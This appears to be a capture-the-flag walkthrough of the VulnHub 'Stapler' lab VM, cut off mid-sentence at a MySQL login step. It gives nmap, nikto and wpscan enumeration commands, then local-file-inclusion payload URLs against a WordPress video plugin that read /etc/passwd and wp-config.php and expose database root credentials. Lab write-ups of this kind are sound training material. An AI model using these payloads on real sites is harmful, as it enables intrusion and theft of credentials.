
STAPLER VM from VH > https://www.vulnhub.com/entry/stapler-1,150/

1. Nmap scanning host 
nmap -sV 192.168.56.102 -p 0-655535 --open
results:
> 21/tcp
> 22/tcp
> 53/tcp
> 80/tcp
> 139/tcp
> 666/tcp
> 3306/tcp
> 12380/tcp

2. Checking port http://192.168.56.102:12380 - fund a website..
> nikto -h 192.168.56.102:12380
results:
> /blogblog/ > wordpress site
> /admin112233/

3. Checking http://192.168.56.102:12380/blogblog/ with wpscan
> wpscan --url http://192.168.56.102:12380/blogblog/ > target site return SSL/TLS ERROR
> checking wpscan with disabled TLS checks: wpscan --url http://192.168.56.102:12380/blogblog/ --disable-tls-checks
results:
> /wp-content/uploads > /wp-content/ include installed plugins (adv. video, short code, two factor)
> /wp-includes/

4. Looking for vul. in installed plugins
> found LFI exploit for that > https://www.exploit-db.com/exploits/39646/
> change the payload to: https://192.168.56.102/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=/etc/passwd (checking the /etc/passwd)
> results: image file in /uploads/ folder
> wget file with: wget --no-check-certificate https://192.168.56.102:12380/blogblog/wp-content/uploads/[image.jpg]
> cat image.jpg
> results: all user list (create user.txt file from it)

5. Check the wp config with: https://192.168.56.102/blogblog/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
> wget file
> cat file [image], result: wp-config.php with mysql credentials: user: root, password: plbkac
> connecting to mysql DB with 
